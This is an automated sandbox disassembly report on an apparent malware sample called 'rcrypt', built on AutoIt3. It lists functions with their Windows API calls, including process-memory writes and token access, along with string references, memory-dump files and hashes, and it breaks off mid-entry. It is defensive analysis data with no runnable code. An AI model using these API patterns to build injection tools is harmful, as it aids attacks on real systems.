Function 0014A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
GetCurrentThreadId.KERNEL32 ref: 0014A3B3
AttachThreadInput.USER32(00000000), ref: 0014A3BA

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
Instruction ID: bb26f1707ffe8cf39bb9bb99bda2d9dc9bfa1fff27fb0d1bf23f3c07cece2a8c
Opcode Fuzzy Hash: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
Instruction Fuzzy Hash: 25E03931585228BADB201FA2DC0CED73F6CFF167A1F408028F50C84460D77185C1CBA0

Function 000F2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000F2231
SetTextColor.GDI32(?,000000FF), ref: 000F223B
SetBkMode.GDI32(?,00000001), ref: 000F2250
GetStockObject.GDI32(00000005), ref: 000F2258
GetWindowDC.USER32(?,00000000), ref: 0012C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0012C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0012C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0012C112
GetPixel.GDI32(00000000,?,?), ref: 0012C132
ReleaseDC.USER32(?,00000000), ref: 0012C13D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
Instruction ID: d072e48a8cba44ea0bf23d1955c86ef634d1ecbf2095e5b969673bb755de9af4
Opcode Fuzzy Hash: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
Instruction Fuzzy Hash: 23E03932204244EADB215F64FC097D93B20EB15332F04836AFB6D884E1877149D1DB51

Function 00148C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00148C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0014882E), ref: 00148C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C7E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
Instruction ID: a950ae36652e7ca150ed769b939f2e29d6826401dc68ba2da6619565240d7a33
Opcode Fuzzy Hash: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
Instruction Fuzzy Hash: C2E08636642211DBD7205FB06D0CB9B3BBCFF507A2F14482CB249CA450DB3484C2CB61

Function 00132187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00132187
GetDC.USER32(00000000), ref: 00132191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
ReleaseDC.USER32(?), ref: 001321D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
Instruction ID: e4e4aaad813f1b1f250758dad08d04ef29a0439bdf371a73e8c770e0eda4b9e3
Opcode Fuzzy Hash: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
Instruction Fuzzy Hash: A3E01A75808208EFDB01AF60C908AAE7BF2FF4C350F118429F95AD7660CB3881C2AF40

Function 0013219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0013219B
GetDC.USER32(00000000), ref: 001321A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
ReleaseDC.USER32(?), ref: 001321D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
Instruction ID: b5bda6d31a5e757ef7c8191b11d893db15294075a7cb075022678c960aa1a315
Opcode Fuzzy Hash: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
Instruction Fuzzy Hash: 76E0E575808208AFCB119F60C8086AE7BB2AB4C310F108029F95A97660CB3891C29F40

Function 0014B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0014B981

Strings

Container, xrefs: 0014B8FE
AutoIt3GUI, xrefs: 0014B8F9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 3f4641bcea203578d24a5843805d05fb5eaa3cad9ec4b9e815c2dd92def70c75
Instruction ID: 52d3e42347d0e29aedc38d4c808170b4eec57d83e7ed7d081d7a4eee1978fc79
Opcode Fuzzy Hash: 3f4641bcea203578d24a5843805d05fb5eaa3cad9ec4b9e815c2dd92def70c75
Instruction Fuzzy Hash: 16915C746042019FDB24DF68C885A66B7F9FF49710F24856DF949CB6A1DB70E841CB50

Function 0015B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

__wcsnicmp.LIBCMT ref: 0015B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0015B361

Strings

LPT, xrefs: 0015B292

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
Instruction ID: 6a98e520bc5b61f5caef9372835f07ec989e18121327c042d2aa56b6e72c8df2
Opcode Fuzzy Hash: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
Instruction Fuzzy Hash: 09617275A04219EFCB18DF98C885EFEB7B4BF08311F114069F956AB291DB70AE44CB90

Function 00102AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00102AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00102AE1

Strings

@, xrefs: 00102AD5

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
Instruction ID: c765726d394248d933095a48b48e8c6fd72fe4f3600c537e539fdffcf0096221
Opcode Fuzzy Hash: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
Instruction Fuzzy Hash: 365146714187489BD320AF14D886BABBBF8FF84310F82885DF2D9511A2DB318569CB66

Function 001599BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000F506B: __fread_nolock.LIBCMT ref: 000F5089

_wcscmp.LIBCMT ref: 00159AAE
_wcscmp.LIBCMT ref: 00159AC1

Strings

FILE, xrefs: 001599FA

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
Instruction ID: 1b9e638e61363b1431fd9266cd782ea5a5bca8b4547f622f93593ff18d8cba2a
Opcode Fuzzy Hash: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
Instruction Fuzzy Hash: BE41D771A00619FADF209EA4DC45FEFB7BDEF45711F000079FA10AB182DB759A0497A1

Function 00162882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00162892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001628C8

Strings

|, xrefs: 00162899

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
Instruction ID: 0c6e01fcc6b464a6b4e2202aa8c07e4f03fc3f03acffed6984037b6d885e5e58
Opcode Fuzzy Hash: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
Instruction Fuzzy Hash: 5F313A71800119AFDF05EFA1CC85EEEBFB9FF08340F10402AF919A6166DB355A56DBA1

Function 00176CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00176D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00176DC2

Strings

static, xrefs: 00176D22

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0c28ab55b3c9b1a7451c6ccc8e4221c4cf83838ba3f696123e415e5f93a156fa
Instruction ID: 7887609ed569f79ffbe9eb44214a13a50f92324dd43ccfcd64c7f4a6d5e0823d
Opcode Fuzzy Hash: 0c28ab55b3c9b1a7451c6ccc8e4221c4cf83838ba3f696123e415e5f93a156fa
Instruction Fuzzy Hash: 02317C71210608AEDB209F68CC80BFB77B9FF48724F108619F9A997190DB31AC91DB60

Function 00152D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00152E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00152E3B

Strings

0, xrefs: 00152DF9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2ebed2e4d1f28ebe33402bed20f0958b65622346f540131ec05c44f8571a3582
Instruction ID: 43162628f2c50b15f726114a420ee089f9137f524b2c20dfcd0d74734d2eb3db
Opcode Fuzzy Hash: 2ebed2e4d1f28ebe33402bed20f0958b65622346f540131ec05c44f8571a3582
Instruction Fuzzy Hash: EF31D733A00305EBEB288F58D8867DEBBB9EF06351F140469EDA59A1A0D7709D89CB50

Function 0014AFDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0010619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001061B1

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0014B03B
_strlen.LIBCMT ref: 0014B046

Strings

@U=u, xrefs: 0014B03B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: 1c8d2b076e8a40f8f51a6471a3ef91fa00b6c2b89b4ac56f92fad2fab75f3310
Instruction ID: 483dfd73ec42d7dfb3fe341a4cab085810fab380d032b914b2f5b89354ba4406
Opcode Fuzzy Hash: 1c8d2b076e8a40f8f51a6471a3ef91fa00b6c2b89b4ac56f92fad2fab75f3310
Instruction Fuzzy Hash: 0E11273260820966CB18AE78DCC2AFF7B799F59301F10003EF6199B1A3DF25C8859260

Function 00176AD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0015589F: GetLocalTime.KERNEL32 ref: 001558AC
Part of subcall function 0015589F: _wcsncpy.LIBCMT ref: 001558E1
Part of subcall function 0015589F: _wcsncpy.LIBCMT ref: 00155913
Part of subcall function 0015589F: _wcsncpy.LIBCMT ref: 00155946
Part of subcall function 0015589F: _wcsncpy.LIBCMT ref: 00155988

SendMessageW.USER32(?,00001002,00000000,?), ref: 00176B6E

Strings

@U=u, xrefs: 00176B6E
SysDateTimePick32, xrefs: 00176B2C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: 01e83934636d2270a19a8c71c49e66457d7f378a7e2707b06adaa4cacdd445cd
Instruction ID: cb2c4dabd12b5dae09b90160ebcec854d18fd77f7f2df4468e2723cc42a7c00f
Opcode Fuzzy Hash: 01e83934636d2270a19a8c71c49e66457d7f378a7e2707b06adaa4cacdd445cd
Instruction Fuzzy Hash: B8210631340209AFEF219E54CC82FEA7379EB55760F108519F958EB1D0D7B1AC8087A0

Function 00149707 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00149720

Part of subcall function 001518EE: GetWindowThreadProcessId.USER32(?,?), ref: 00151919
Part of subcall function 001518EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0014973C,00000034,?,?,00001004,00000000,00000000), ref: 00151929
Part of subcall function 001518EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0014973C,00000034,?,?,00001004,00000000,00000000), ref: 0015193F

Part of subcall function 001519CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00149778,?,?,00000034,00000800,?,00000034), ref: 001519F6

SendMessageW.USER32(?,00001073,00000000,?), ref: 00149787

Part of subcall function 00151997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001497A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001519C1

Strings

@U=u, xrefs: 00149720, 00149787

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: 83fac867666d3d71973bb2d9b1da264badeeae4a11af3d50915b4cdaa365d4aa
Instruction ID: 77acf5e624acfe325e50a2d74bf0ec49bb0679e1544312eb25df32137f1a1e45
Opcode Fuzzy Hash: 83fac867666d3d71973bb2d9b1da264badeeae4a11af3d50915b4cdaa365d4aa
Instruction Fuzzy Hash: FD214C31901129ABEF21ABA4CC41FDABBB8FF18355F1001A5F958A71A0DB705A94DF90

Function 00176943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001769D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001769DB

Strings

Combobox, xrefs: 0017699D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
Instruction ID: 80e41902b0373ce9cc0d4858a8443716273227bd14e82206eeb8e135485bd130
Opcode Fuzzy Hash: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
Instruction Fuzzy Hash: A811C471700609AFEF119F14CC90EFB377AEB993A8F118124FA5C97291D7759C9187A0

Function 00179962 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

@U=u, xrefs: 001799E7, 00179A10

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 81aabf1df9e19c095c79e6375397574c8cdeab8270fd082e575b4aba9ba9e33a
Instruction ID: 1c99e38e88644a24b6d9994ffd5496262bf1ee8753a9400f757413bbd9af4f5e
Opcode Fuzzy Hash: 81aabf1df9e19c095c79e6375397574c8cdeab8270fd082e575b4aba9ba9e33a
Instruction Fuzzy Hash: 13219A71244208BFEB148F688C42FBA37B4EB09354F008159FA1AEB1E1D770ED589B60

Function 00176E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91

GetWindowRect.USER32(00000000,?), ref: 00176EE0
GetSysColor.USER32(00000012), ref: 00176EFA

Strings

static, xrefs: 00176EBD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

